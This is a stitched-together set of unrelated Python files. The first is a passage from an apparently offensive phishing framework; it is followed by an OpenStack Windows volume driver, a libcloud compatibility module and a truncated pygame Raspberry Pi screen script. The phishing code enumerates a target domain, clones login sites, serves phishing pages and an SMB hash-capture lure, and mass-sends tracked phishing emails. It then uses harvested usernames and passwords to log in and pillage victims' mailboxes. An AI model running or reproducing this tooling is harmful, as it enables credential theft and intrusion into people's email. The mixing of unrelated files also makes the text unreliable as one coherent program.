self.display.verbose("Gathered [%s] hosts from DNS Zone Transfer" % (len(temp_list)))
self.hostname_list += temp_list
temp_list = Dns.ns(self.config["domain_name"])
temp_list = Utils.filterList(temp_list, self.config["domain_name"])
self.display.verbose("Gathered [%s] hosts from DNS NS lookups" % (len(temp_list)))
self.hostname_list += temp_list
temp_list = Dns.mx(self.config["domain_name"])
temp_list = Utils.filterList(temp_list, self.config["domain_name"])
self.display.verbose("Gathered [%s] hosts from DNS MX lookups" % (len(temp_list)))
self.hostname_list += temp_list
# Gather hosts from dictionary lookup
try:
temp_list = Dns.brute(self.config["domain_name"], display=self.display)
except:
pass
self.display.verbose("Gathered [%s] hosts from DNS BruteForce/Dictionay Lookup" % (len(temp_list)))
self.hostname_list += temp_list
# sort/unique hostname list
self.hostname_list = Utils.unique_list(self.hostname_list)
self.hostname_list.sort()
# add list of identified hosts to sqllite db
self.db.addHosts(self.hostname_list)
# print list of hostnames
self.display.verbose("Collected [%s] unique host names" % (len(self.hostname_list)))
self.display.print_list("HOST LIST", self.hostname_list)
#----------------------------
# Perform Port Scans
#----------------------------
def port_scan(self):
# are required flags set?
if (self.config["gather_dns"] == True):
self.display.output("Performing basic port scans of any identified hosts.")
# define list of ports to scan for
ports = [25, 80,110, 143, 443, 993, 995]
# prep array of arrays
for port in ports:
self.server_list[port] = []
# for each host in the host list
for host in self.hostname_list:
# run port scan
openports = portscan.scan(host, ports)
found = False
# for any open ports, add it to the associated list
for port in openports:
self.db.addPort(port, host)
if (port == 80):
self.display.verbose("Found website at: %s 80" % (host))
self.server_list[80].append(host)
found = True
elif (port == 443):
self.display.verbose("Found website at: %s 443" % (host))
self.server_list[443].append(host)
found = True
elif (port == 110):
self.display.verbose("Found POP at : %s 110" % (host))
self.server_list[110].append(host)
found = True
elif (port == 995):
self.display.verbose("Found POPS at : %s 995" % (host))
self.server_list[995].append(host)
found = True
elif (port == 143):
self.display.verbose("Found IMAP at : %s 143" % (host))
self.server_list[143].append(host)
found = True
elif (port == 993):
self.display.verbose("Found IMAPS at : %s 993" % (host))
self.server_list[993].append(host)
found = True
elif (port == 25):
self.display.verbose("Found SMTP at : %s 25" % (host))
self.server_list[25].append(host)
found = True
if (found):
self.display.log(host + "\n", filename="hosts.txt")
#----------------------------
# Profile Web Sites
#----------------------------
def profile_site(self):
# are required flags set?
if (self.config["profile_domain"] == True):
self.display.output("Determining if any of the identified hosts have web servers.")
# for hosts in the port 80 list
for host in self.server_list[80]:
# create a profiler object
p = profiler()
# run it against the website
profile_results = p.run("http://" + host, debug=False)
# if we got valid results, look to see if we have a match for one of the templates
if (profile_results and (len(profile_results) > 0)):
max_key = ""
max_value = 0
for key, value in profile_results:
if (value.getscore() > max_value):
max_key = key
max_value = value.getscore()
if (max_value > 0):
self.display.verbose("POSSIBLE MATCH FOR [http://%s] => [%s]" % (host, max_key))
self.profile_valid_web_templates.append(max_key)
else:
# other wise we will see about adding it to a list of sites to clone
if (p.hasLogin("http://" + host)):
self.profile_dynamic_web_templates.append("http://" + host)
# repeat same as for port 80
for host in self.server_list[443]:
p = profiler()
profile_results = p.run("https://" + host, debug=False)
if (profile_results and (len(profile_results) > 0)):
max_key = ""
max_value = 0
for key, value in profile_results:
if (value.getscore() > max_value):
max_key = key
max_value = value.getscore()
if (max_value > 0):
self.display.verbose("POSSIBLE MATCH FOR [https://%s] => [%s]" % (host, max_key))
self.profile_valid_web_templates.append(max_key)
else:
if (p.hasLogin("https://" + host)):
self.display.verbose("POSSIBLE DYNAMIC TEMPLATE SITE [https://%s]" % (host))
self.profile_dynamic_web_templates.append("https://" + host)
# sort/unique list of valid templates
self.profile_valid_web_templates = Utils.unique_list(self.profile_valid_web_templates)
self.profile_valid_web_templates.sort()
# print list of valid templatess
self.display.verbose("Collected [%s] valid web templates" % (len(self.profile_valid_web_templates)))
self.display.print_list("VALID TEMPLATE LIST",self.profile_valid_web_templates)
# sort/unique list of dynamic templates
self.profile_dynamic_web_templates = Utils.unique_list(self.profile_dynamic_web_templates)
self.profile_dynamic_web_templates.sort()
# print list of valid templatess
self.display.verbose("Collected [%s] dynamic web templates" % (len(self.profile_dynamic_web_templates)))
self.display.print_list("DYNAMIC TEMPLATE LIST",self.profile_dynamic_web_templates)
# sort/unique hostname list
self.profile_dynamic_web_templates = Utils.lowercase_list(self.profile_dynamic_web_templates)
self.profile_dynamic_web_templates = Utils.unique_list(self.profile_dynamic_web_templates)
self.profile_dynamic_web_templates.sort()
# for any dynamic sites, try to clone them
self.display.output("Cloning any DYNAMIC sites")
for template in self.profile_dynamic_web_templates:
sc = SiteCloner(clone_dir=self.outdir+"web_clones/")
tdir = sc.cloneUrl(template)
self.display.verbose("Cloning [%s] to [%s]" % (template, tdir))
self.db.addWebTemplate(ttype="dynamic", src_url=template, tdir=tdir)
# loop over all built in templates
for f in os.listdir(self.config["web_template_path"]):
template_file = os.path.join(self.config["web_template_path"], f) + "/CONFIG"
for line in open(template_file).readlines():
for tem in self.profile_valid_web_templates:
if re.match("^VHOST=\s*"+tem+"\s*$", line, re.IGNORECASE):
self.db.addWebTemplate(ttype="static", src_url="", tdir=os.path.join(self.config["web_template_path"], f))
break
#----------------------------
# Select Web Templates
#----------------------------
def select_web_templates(self):
templates = []
# get lists of current templates
db_static_templates = self.db.getWebTemplates(ttype="static")
db_dynamic_templates = self.db.getWebTemplates(ttype="dynamic")
# check to see if we have templates
if (db_static_templates or db_dynamic_templates):
for template in db_static_templates:
parts = template.split("[-]")
template_file = parts[0] + "/CONFIG"
if Utils.is_readable(template_file) and os.path.isfile(template_file):
templates.append(("static", parts[0], parts[1]))
for template in db_dynamic_templates:
parts = template.split("[-]")
template_file = parts[0] + "/CONFIG"
if Utils.is_readable(template_file) and os.path.isfile(template_file):
templates.append(("dynamic", parts[0], parts[1]))
else:
# assume we do not have any valid templates
# load all standard templates
for f in os.listdir(self.config["web_template_path"]):
template_file = os.path.join(self.config["web_template_path"], f) + "/CONFIG"
if Utils.is_readable(template_file) and os.path.isfile(template_file):
templates.append(("static", os.path.join(self.config["web_template_path"], f), ""))
print("FIXED = [%s]" % (os.path.join(self.config["web_template_path"], f)))
# if "always yes" is enabled then just use all templates
if (not self.config["always_yes"]):
items = self.display.selectlist("Please select (comma seperated) the item(s) you wish to use. (prese ENTER to use all): ", templates)
size_of_templates = len(templates)
if items and (len(items) > 0):
templates_temp = []
self.db.clearWebTemplates()
for item in items:
if (int(item) > 0) and (int(item) <= size_of_templates):
self.display.verbose("Enabled Template: " + str(templates[int(item)-1]))
templates_temp.append(templates[int(item)-1])
self.db.addWebTemplate(ttype=templates[int(item)-1][0], src_url=templates[int(item)-1][2], tdir=templates[int(item)-1][1])
else:
self.display.alert("Invalid select of [" + item + "] was ignored")
templates = templates_temp
# print list of enabled templates
self.display.print_list("TEMPLATE LIST", templates)
#----------------------------
# Start SMB Server
#----------------------------
def start_smbserver(self):
if self.config["enable_smb_server"] == "1":
print()
self.display.output("Starting SMB Server")
if (self.config["always_yes"] or self.display.yn("Continue", default="y")):
path = os.path.dirname(os.path.realpath(__file__))
# Start process
cmd = [path + "/../smbsrv.py"]
#self.smbserver = subprocess.Popen(cmd, shell=False, stdout=subprocess.PIPE)
self.smbserver = subprocess.Popen(cmd, shell=False, stdout=subprocess.PIPE)
# Write PID file
pidfilename = os.path.join(self.pid_path, "spfsmbsrv.pid")
pidfile = open(pidfilename, 'w')
pidfile.write(str(self.smbserver.pid))
pidfile.close()
self.smbserverpid = self.smbserver.pid
self.display.verbose("Started SMBServer with pid = [%s]" % self.smbserver.pid)
return
#----------------------------
# Load web sites
#----------------------------
def load_websites(self):
# a required flags set?
if self.config["enable_web"] == True:
self.select_web_templates()
print()
self.display.output("Starting phishing webserver")
if (self.config["always_yes"] or self.display.yn("Continue", default="y")):
path = os.path.dirname(os.path.realpath(__file__))
# Start process
cmd = [path + "/../web.py", Utils.compressDict(self.config)]
self.webserver = subprocess.Popen(cmd, shell=False, stdout=subprocess.PIPE)
# monitor output to gather website information
while True:
line = self.webserver.stdout.readline()
line = line.decode()
line = line.strip()
if line == 'Websites loaded and launched.':
break
if line != '':
self.display.verbose(line)
match=re.search("Started website", line)
VHOST = ""
PORT = ""
if match:
parts=line.split("[")
VHOST=parts[1].split("]")
VHOST=VHOST[0].strip()
PORT=parts[2].split("]")
PORT=PORT[0].strip()
PORT=PORT[7:]
# keep the URL clean
# if port is 80, then it does not need to be included in the URL
if (PORT[-3:] == ":80"):
PORT = PORT[:-3]
#PORT = str(PORT)
#VHOST = str(VHOST)
self.config[VHOST.encode() + b"_port"] = PORT
self.config[VHOST.encode() + b"_vhost"] = VHOST
Utils.screenCaptureWebSite("http://" + str(PORT),
self.outdir + "screenshots/" + str(PORT) + "_" + str(VHOST) + ".png")
Utils.screenCaptureWebSite("http://" + str(VHOST) + "." + self.config["phishing_domain"],
self.outdir + "screenshots/" + str(VHOST) + "." + self.config["phishing_domain"] + ".png")
# Write PID file
pidfilename = os.path.join(self.pid_path, "spfwebsrv.pid")
pidfile = open(pidfilename, 'w')
pidfile.write(str(self.webserver.pid))
pidfile.close()
self.webserverpid = self.webserver.pid
self.display.verbose("Started WebServer with pid = [%s]" % self.webserver.pid)
#----------------------------
# Build array of email templates
#----------------------------
def load_email_templates(self):
# do we even have targets?
if (((self.email_list is not None)
and (self.email_list))
and ((self.config["enable_email_sending"] == True)
or (self.config["simulate_email_sending"] == True))):
print()
self.display.verbose("Locating phishing email templates")
if (self.config["always_yes"] or self.display.yn("Continue", default="y")):
# loop over each email template
for f in os.listdir("templates/email/"):
template_file = os.path.join("templates/email/", f)
self.display.debug("Found the following email template: [%s]" % template_file)
if ((Utils.is_readable(template_file)) and (os.path.isfile(template_file))):
# read in the template SUBJECT, TYPE, and BODY
TYPE = ""
SUBJECT = ""
BODY = ""
with open (template_file, "r") as myfile:
for line in myfile.readlines():
match=re.search("TYPE=", line)
if match:
TYPE=line.replace('"', "")
TYPE=TYPE.split("=")
TYPE=TYPE[1].lower().strip()
match2=re.search("SUBJECT=", line)
if match2:
SUBJECT=line.replace('"', "")
SUBJECT=SUBJECT.split("=")
SUBJECT=SUBJECT[1].strip()
match3=re.search("BODY=", line)
if match3:
BODY=line.replace('"', "")
BODY=BODY.replace(r'\n', "\n")
BODY=BODY.split("=")
BODY=BODY[1].strip()
if ((TYPE + "_port").encode() in list(self.config.keys())):
self.email_templates[TYPE].append(EmailTemplate(TYPE, SUBJECT, BODY))
else:
self.display.debug(" No Matching webtemplate found. Skipping this email template.")
#----------------------------
# Generate/Send phishing emails
#----------------------------
def send_emails(self):
# are required flags set?
if ((self.config["enable_email_sending"] == True) or (self.config["simulate_email_sending"] == True)):
if ((self.config["determine_smtp"] == "1") and (self.config["use_specific_smtp"] == "1")):
self.display.error("ONLY 1 of DETERMINE_SMTP or USE_SPECIFIC_SMTP can be enabled at a time.")
else:
print()
self.display.output("Sending phishing emails")
if (self.config["always_yes"] or self.display.yn("Continue", default="y")):
templates_logged = []
#do we have any emails top send?
if self.email_list:
temp_target_list = self.email_list
temp_delay = 1
if (self.config["email_delay"] is not None):
temp_delay = int(self.config["email_delay"])
send_count = 0
# while there are still target email address, loop
while (temp_target_list and (send_count < (int(self.config["emails_max"])))):
#for k in self.email_templates:
# print(self.email_templates[k])
# inc number of emails we have attempted to send
send_count = send_count + 1
# delay requested amount of time between sending emails
time.sleep(temp_delay)
# for each type of email (citrix, owa, office365, ...)
for key in self.email_templates:
if ((key+"_port").encode() in list(self.config.keys())):
# double check
if temp_target_list:
# for each email template of the given type
for template in self.email_templates[key]:
# double check
if temp_target_list:
# grab a new target email address
target = temp_target_list.pop(0)
self.display.verbose("Sending Email to [%s]" % target)
#FROM = "support@" + self.config["phishing_domain"]
FROM = self.config["smtp_fromaddr"]
SUBJECT = template.getSUBJECT()
BODY = template.getBODY()
HTML_BODY = "<html><head></head><body>"
HTML_BODY += BODY.replace('\n', '<br>')
if self.config["enable_smb_server"] == "1":
HTML_BODY += '<br> <img src=file://' + str(key) + "." + str(self.config["phishing_domain"]) + '/image/sig.jpg height="100" width="150"></a>'
HTML_BODY += "</BODY></HTML>"
# perform necessary SEARCH/REPLACE
if self.config["enable_host_based_vhosts"] == "1":
targetlink=str("http://" + str(key) + "." + str(self.config["phishing_domain"]))
if self.config["enable_user_tracking"] == "1":
targetlink += "?u=" + self.db.getUserTrackId(target)
BODY=BODY.replace(r'[[TARGET]]', targetlink)
HTML_BODY = HTML_BODY.replace(r'[[TARGET]]', '<a href="' + targetlink + '">' + targetlink + '</a>')
else:
if (not key == b"dynamic"):
k = (key.encode() + b"_port")
p = self.config[k]
targetlink=str("http://" + str(p))
if self.config["enable_user_tracking"] == "1":
targetlink += "?u=" + self.db.getUserTrackId(target)
BODY=BODY.replace(r'[[TARGET]]', str(targetlink))
HTML_BODY = HTML_BODY.replace(r'[[TARGET]]', '<a href="' + str(targetlink) + '">' + str(targetlink) + '</a>')
# log
if (key not in templates_logged):
self.display.log("----------------------------------------------\n\n" +
"TO: <XXXXX>\n" +
"FROM: " + FROM + "\n" +
"SUBJECT: " + SUBJECT + "\n\n" +
BODY + "\n\n" +
HTML_BODY + "\n\n" +
"----------------------------------------------\n\n" +
"TARGETS:\n" +
"--------\n",
filename="email_template_" + key + ".txt")
templates_logged.append(key)
self.display.log(target + "\n", filename="email_template_" + key + ".txt")
# send the email
if (self.config["simulate_email_sending"] == True):
self.display.output("Would have sent an email to [%s] with subject of [%s], but this was just a test." % (target, SUBJECT))
else:
try:
if self.config["determine_smtp"] == "1":
emails.send_email_direct(target,
FROM,
self.config["smtp_displayname"],
SUBJECT,
BODY,
HTML_BODY,
self.config["attachment_filename"],
self.config["attachment_fullpath"],
True)
if self.config["use_specific_smtp"] == "1":
print(self.config["smtp_fromaddr"])
emails.send_email_account(self.config["smtp_server"],
int(self.config["smtp_port"]),
self.config["smtp_user"],
self.config["smtp_pass"],
target,
self.config["smtp_fromaddr"],
self.config["smtp_displayname"],
SUBJECT,
BODY,
HTML_BODY,
self.config["attachment_filename"],
self.config["attachment_fullpath"],
True)
except Exception as e:
self.display.error("Can not send email to " + target)
print(e)
#----------------------------
# Monitor web sites
#----------------------------
def monitor_results(self):
# are required flags set?
monitor = False
print()
self.display.output("Starting Monitoring Services")
self.display.alert("(Press CTRL-C to stop collection and generate report!)")
if self.config["enable_web"] == True:
monitor = True
self.display.output("Monitoring phishing website activity!")
if self.config["enable_smb_server"] == "1":
monitor = True
self.display.output("Monitoring SMB server activity!")
if monitor:
while True:
#if self.smbserver is not None:
# line = self.smbserver.stdout.readline()
# line = line.strip()
# self.display.output(line)
if (self.webserver is not None):
line = self.webserver.stdout.readline()
line = line.decode()
line = line.strip()
self.display.output(line)
if("CREDENTIALS" in line):
if (self.config["pillage_email"] == True):
self.pillage(line)
#==================================================
# Secondary METHODS
#==================================================
#----------------------------
# Pillage Emails
#----------------------------
def pillage(self, line):
username = None
password = None
# parse line into username/password
usermatch = re.match(".*username=(.*?), .*", line)
if (usermatch):
username = usermatch.group(1)
passmatch = re.match(".*password=(.*?), .*", line)
if (passmatch):
password = passmatch.group(1)
# if no username or password, then return
if ((not username) or (not password)):
return
# is it a new username/password pair we have not seen before?
if (not username+":"+password in self.pillaged_users):
self.pillaged_users.append(username+":"+password)
# make a new MailPillager if one does not exist
if (not self.mp):
self.mp = MailPillager()
# attempt to determine the best Mail Server to use
if (not self.bestMailServer):
self.determineBestMailServer()
# if no Best Mail Server was identified, return
if (not self.bestMailServer):
self.display.error("No valid target IMAP/POP3 mail servers were identified.")
return
#print self.bestMailServer + ":" + str(self.bestMailServerPort)
# PILLAGE!!!
self.mp.pillage(username=username, password=password, server=self.bestMailServer,
port=self.bestMailServerPort, domain=self.config["domain_name"], outputdir=self.outdir + "pillage_data/")
#----------------------------
# See which Mail Server we should use
#
# TODO: needs to be updated!!!
#----------------------------
def determineBestMailServer(self):
if self.server_list[993]: # IMAPS
self.bestMailServerPort = 993
self.bestMailServer = self.server_list[993][0]
elif self.server_list[143]: #IMAP
self.bestMailServerPort = 143
self.bestMailServer = self.server_list[143][0]
elif self.server_list[995]: # POP3S
self.bestMailServerPort = 995
self.bestMailServer = self.server_list[995][0]
elif self.server_list[110]: # POP3
self.bestMailServerPort = 110
self.bestMailServer = self.server_list[110][0]
#==========================================================================================
#==========================================================================================
#==========================================================================================
#----------------------------
# Primary METHOD
#----------------------------
def run(self, argv):
# load config
self.parse_parameters(argv)
self.load_config()
print("1")
# make directories
if not os.path.isdir(self.outdir + "reports/"):
os.makedirs(self.outdir + "reports/")
if not os.path.isdir(self.outdir + "logs/"):
os.makedirs(self.outdir + "logs/")
if not os.path.isdir(self.outdir + "screenshots/"):
os.makedirs(self.outdir + "screenshots/")
if not os.path.isdir(self.outdir + "web_clones/"):
os.makedirs(self.outdir + "web_clones/")
if not os.path.isdir(self.outdir + "pillage_data/"):
os.makedirs(self.outdir + "pillage_data/")
# dns/portscan/cloning
self.gather_dns()
self.port_scan()
self.profile_site()
# load websites
self.load_websites()
# start smbserver
self.start_smbserver()
# do email stuff
self.prep_email()
self.load_email_templates()
self.send_emails()
# sit back and listen
self.monitor_results()
| |
# Copyright 2012 Pedro Navarro Perez
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Volume driver for Windows Server 2012
This driver requires ISCSI target role installed
"""
import os
from oslo_config import cfg
from cinder.image import image_utils
from cinder.openstack.common import fileutils
from cinder.openstack.common import log as logging
from cinder.volume import driver
from cinder.volume.drivers.windows import constants
from cinder.volume.drivers.windows import vhdutils
from cinder.volume.drivers.windows import windows_utils
LOG = logging.getLogger(__name__)
windows_opts = [
cfg.StrOpt('windows_iscsi_lun_path',
default='C:\iSCSIVirtualDisks',
help='Path to store VHD backed volumes'),
]
CONF = cfg.CONF
CONF.register_opts(windows_opts)
class WindowsDriver(driver.ISCSIDriver):
"""Executes volume driver commands on Windows Storage server."""
VERSION = '1.0.0'
def __init__(self, *args, **kwargs):
super(WindowsDriver, self).__init__(*args, **kwargs)
self.configuration = kwargs.get('configuration', None)
if self.configuration:
self.configuration.append_config_values(windows_opts)
def do_setup(self, context):
"""Setup the Windows Volume driver.
Called one time by the manager after the driver is loaded.
Validate the flags we care about
"""
self.utils = windows_utils.WindowsUtils()
self.vhdutils = vhdutils.VHDUtils()
def check_for_setup_error(self):
"""Check that the driver is working and can communicate."""
self.utils.check_for_setup_error()
def initialize_connection(self, volume, connector):
"""Driver entry point to attach a volume to an instance."""
initiator_name = connector['initiator']
target_name = volume['provider_location']
self.utils.associate_initiator_with_iscsi_target(initiator_name,
target_name)
properties = self.utils.get_host_information(volume, target_name)
return {
'driver_volume_type': 'iscsi',
'data': properties,
}
def terminate_connection(self, volume, connector, **kwargs):
"""Driver entry point to unattach a volume from an instance.
Unmask the LUN on the storage system so the given initiator can no
longer access it.
"""
initiator_name = connector['initiator']
target_name = volume['provider_location']
self.utils.delete_iscsi_target(initiator_name, target_name)
def create_volume(self, volume):
"""Driver entry point for creating a new volume."""
vhd_path = self.local_path(volume)
vol_name = volume['name']
vol_size = volume['size']
self.utils.create_volume(vhd_path, vol_name, vol_size)
def local_path(self, volume, format=None):
return self.utils.local_path(volume, format)
def delete_volume(self, volume):
"""Driver entry point for destroying existing volumes."""
vol_name = volume['name']
vhd_path = self.local_path(volume)
self.utils.delete_volume(vol_name, vhd_path)
def create_snapshot(self, snapshot):
"""Driver entry point for creating a snapshot."""
# Getting WT_Snapshot class
vol_name = snapshot['volume_name']
snapshot_name = snapshot['name']
self.utils.create_snapshot(vol_name, snapshot_name)
def create_volume_from_snapshot(self, volume, snapshot):
"""Driver entry point for exporting snapshots as volumes."""
snapshot_name = snapshot['name']
self.utils.create_volume_from_snapshot(volume, snapshot_name)
def delete_snapshot(self, snapshot):
"""Driver entry point for deleting a snapshot."""
snapshot_name = snapshot['name']
self.utils.delete_snapshot(snapshot_name)
def _do_export(self, _ctx, volume, ensure=False):
"""Do all steps to get disk exported as LUN 0 at separate target.
:param volume: reference of volume to be exported
:param ensure: if True, ignore errors caused by already existing
resources
:return: iscsiadm-formatted provider location string
"""
target_name = "%s%s" % (self.configuration.iscsi_target_prefix,
volume['name'])
self.utils.create_iscsi_target(target_name, ensure)
# Get the disk to add
vol_name = volume['name']
self.utils.add_disk_to_target(vol_name, target_name)
return target_name
def ensure_export(self, context, volume):
"""Driver entry point to get the export info for an existing volume."""
self._do_export(context, volume, ensure=True)
def create_export(self, context, volume):
"""Driver entry point to get the export info for a new volume."""
loc = self._do_export(context, volume, ensure=False)
return {'provider_location': loc}
def remove_export(self, context, volume):
"""Driver entry point to remove an export for a volume.
"""
target_name = "%s%s" % (self.configuration.iscsi_target_prefix,
volume['name'])
self.utils.remove_iscsi_target(target_name)
def copy_image_to_volume(self, context, volume, image_service, image_id):
"""Fetch the image from image_service and create a volume using it."""
# Convert to VHD and file back to VHD
vhd_type = self.utils.get_supported_vhd_type()
with image_utils.temporary_file(suffix='.vhd') as tmp:
volume_path = self.local_path(volume)
image_utils.fetch_to_vhd(context, image_service, image_id, tmp,
self.configuration.volume_dd_blocksize)
# The vhd must be disabled and deleted before being replaced with
# the desired image.
self.utils.change_disk_status(volume['name'], False)
os.unlink(volume_path)
self.vhdutils.convert_vhd(tmp, volume_path,
vhd_type)
self.vhdutils.resize_vhd(volume_path,
volume['size'] << 30)
self.utils.change_disk_status(volume['name'], True)
def copy_volume_to_image(self, context, volume, image_service, image_meta):
"""Copy the volume to the specified image."""
disk_format = self.utils.get_supported_format()
if not os.path.exists(self.configuration.image_conversion_dir):
fileutils.ensure_tree(self.configuration.image_conversion_dir)
temp_vhd_path = os.path.join(self.configuration.image_conversion_dir,
str(image_meta['id']) + '.' + disk_format)
upload_image = temp_vhd_path
try:
self.utils.copy_vhd_disk(self.local_path(volume), temp_vhd_path)
# qemu-img does not yet fully support vhdx format, so we'll first
# convert the image to vhd before attempting upload
if disk_format == 'vhdx':
upload_image = upload_image[:-1]
self.vhdutils.convert_vhd(temp_vhd_path, upload_image,
constants.VHD_TYPE_DYNAMIC)
image_utils.upload_volume(context, image_service, image_meta,
upload_image, 'vhd')
finally:
fileutils.delete_if_exists(temp_vhd_path)
fileutils.delete_if_exists(upload_image)
def create_cloned_volume(self, volume, src_vref):
"""Creates a clone of the specified volume."""
# Create a new volume
# Copy VHD file of the volume to clone to the created volume
self.create_volume(volume)
self.utils.copy_vhd_disk(self.local_path(src_vref),
self.local_path(volume))
def get_volume_stats(self, refresh=False):
"""Get volume stats.
If 'refresh' is True, run update the stats first.
"""
if refresh:
self._update_volume_stats()
return self._stats
def _update_volume_stats(self):
"""Retrieve stats info for Windows device."""
LOG.debug("Updating volume stats")
data = {}
backend_name = self.__class__.__name__
if self.configuration:
backend_name = self.configuration.safe_get('volume_backend_name')
data["volume_backend_name"] = backend_name or self.__class__.__name__
data["vendor_name"] = 'Microsoft'
data["driver_version"] = self.VERSION
data["storage_protocol"] = 'iSCSI'
data['total_capacity_gb'] = 'infinite'
data['free_capacity_gb'] = 'infinite'
data['reserved_percentage'] = 100
data['QoS_support'] = False
self._stats = data
def extend_volume(self, volume, new_size):
"""Extend an Existing Volume."""
old_size = volume['size']
LOG.debug("Extend volume from %(old_size)s GB to %(new_size)s GB.",
{'old_size': old_size, 'new_size': new_size})
additional_size = (new_size - old_size) * 1024
self.utils.extend(volume['name'], additional_size)
| |
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Libcloud Python 2.x and 3.x compatibility layer
# Some methods below are taken from Django PYK3 port which is licensed under 3
# clause BSD license
# https://bitbucket.org/loewis/django-3k
# pylint: disable=import-error
from __future__ import absolute_import
import sys
import types
DEFAULT_LXML = False
try:
if DEFAULT_LXML:
from lxml import etree as ET
else:
from xml.etree import ElementTree as ET
except ImportError:
from xml.etree import ElementTree as ET
PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3
PY2_pre_25 = PY2 and sys.version_info < (2, 5)
PY2_pre_26 = PY2 and sys.version_info < (2, 6)
PY2_pre_27 = PY2 and sys.version_info < (2, 7)
PY2_pre_279 = PY2 and sys.version_info < (2, 7, 9)
PY3_pre_32 = PY3 and sys.version_info < (3, 2)
PY2 = False
PY25 = False
PY26 = False
PY27 = False
PY3 = False
PY32 = False
if sys.version_info >= (2, 0) and sys.version_info < (3, 0):
PY2 = True
if sys.version_info >= (2, 5) and sys.version_info < (2, 6):
PY25 = True
if sys.version_info >= (2, 6) and sys.version_info < (2, 7):
PY26 = True
if sys.version_info >= (2, 7) and sys.version_info < (2, 8):
PY27 = True
if sys.version_info >= (3, 0):
PY3 = True
if sys.version_info >= (3, 2) and sys.version_info < (3, 3):
PY32 = True
if PY2_pre_279 or PY3_pre_32:
try:
from backports.ssl_match_hostname import match_hostname, CertificateError # NOQA
except ImportError:
import warnings
warnings.warn("Missing backports.ssl_match_hostname package")
else:
# ssl module in Python >= 3.2 includes match hostname function
from ssl import match_hostname, CertificateError # NOQA
if PY3:
import http.client as httplib
from io import StringIO
import urllib
import urllib as urllib2
# pylint: disable=no-name-in-module
import urllib.parse as urlparse
import xmlrpc.client as xmlrpclib
from urllib.parse import quote as urlquote
from urllib.parse import unquote as urlunquote
from urllib.parse import urlencode as urlencode
from os.path import relpath
from imp import reload
from builtins import bytes
from builtins import next
parse_qs = urlparse.parse_qs
parse_qsl = urlparse.parse_qsl
basestring = str
def method_type(callable, instance, klass):
return types.MethodType(callable, instance or klass())
def b(s):
if isinstance(s, str):
return s.encode('utf-8')
elif isinstance(s, bytes):
return s
elif isinstance(s, int):
return bytes([s])
else:
raise TypeError("Invalid argument %r for b()" % (s,))
def ensure_string(s):
if isinstance(s, str):
return s
elif isinstance(s, bytes):
return s.decode('utf-8')
else:
raise TypeError("Invalid argument %r for ensure_string()" % (s,))
def byte(n):
# assume n is a Latin-1 string of length 1
return ord(n)
_real_unicode = str
u = str
def bchr(s):
"""Take an integer and make a 1-character byte string."""
return bytes([s])
def dictvalues(d):
return list(d.values())
def tostring(node):
return ET.tostring(node, encoding='unicode')
def hexadigits(s):
# s needs to be a byte string.
return [format(x, "x") for x in s]
else:
import httplib # NOQA
from StringIO import StringIO # NOQA
import urllib # NOQA
import urllib2 # NOQA
import urlparse # NOQA
import xmlrpclib # NOQA
from urllib import quote as _urlquote # NOQA
from urllib import unquote as urlunquote # NOQA
from urllib import urlencode as urlencode # NOQA
from __builtin__ import reload # NOQA
if PY25:
import cgi
parse_qs = cgi.parse_qs
parse_qsl = cgi.parse_qsl
else:
parse_qs = urlparse.parse_qs
parse_qsl = urlparse.parse_qsl
if not PY25:
from os.path import relpath # NOQA
# Save the real value of unicode because urlquote needs it to tell the
# difference between a unicode string and a byte string.
_real_unicode = unicode
basestring = unicode = str
method_type = types.MethodType
b = bytes = ensure_string = str
def byte(n):
return n
u = unicode
def bchr(s):
"""Take an integer and make a 1-character byte string."""
return chr(s)
_default_value_next = object()
def next(iterator, default=_default_value_next):
try:
return iterator.next()
except StopIteration:
if default is _default_value_next:
raise
return default
def dictvalues(d):
return d.values()
tostring = ET.tostring
def urlquote(s, safe='/'):
if isinstance(s, _real_unicode):
# Pretend to be py3 by encoding the URI automatically.
s = s.encode('utf8')
return _urlquote(s, safe)
def hexadigits(s):
# s needs to be a string.
return [x.encode("hex") for x in s]
if PY25:
import posixpath
# Taken from http://jimmyg.org/work/code/barenecessities/index.html
# (MIT license)
# pylint: disable=function-redefined
def relpath(path, start=posixpath.curdir): # NOQA
"""Return a relative version of a path"""
if not path:
raise ValueError("no path specified")
start_list = posixpath.abspath(start).split(posixpath.sep)
path_list = posixpath.abspath(path).split(posixpath.sep)
# Work out how much of the filepath is shared by start and path.
i = len(posixpath.commonprefix([start_list, path_list]))
rel_list = [posixpath.pardir] * (len(start_list) - i) + path_list[i:]
if not rel_list:
return posixpath.curdir
return posixpath.join(*rel_list)
if PY27 or PY3:
unittest2_required = False
else:
unittest2_required = True
| |
#-*-encoding=UTF8-*-
import pygame
from pygame.locals import *
import time
import datetime
import sys
import os
import glob
import subprocess
import RPi.GPIO as GPIO
__VERSION__='1'
__RELEASE__='0'
os.environ["SDL_FBDEV"] = "/dev/fb1"
os.environ["SDL_MOUSEDEV"] = "/dev/input/touchscreen"
os.environ["SDL_MOUSEDRV"] = "TSLIB"
# This is not necessary for my screen but may be some screens need it so I keep it
# I suppose it is used to activate backlight
GPIO.setmode(GPIO.BCM)
GPIO.setup(18, GPIO.OUT)
GPIO.output(18, GPIO.HIGH)
#colors R G B
white = (255, 255, 255)
red = (255, 0, 0)
green = ( 0, 255, 0)
blue = ( 0, 0, 255)
black = ( 0, 0, 0)
cyan = ( 50, 255, 255)
magenta = (255, 0, 255)
yellow = (255, 255, 0)
orange = (255, 127, 0)
#screen size
width = 480
height = 320
size = (width, height)
screen = pygame.display.set_mode(size)
pygame.init()
#disable mouse cursor
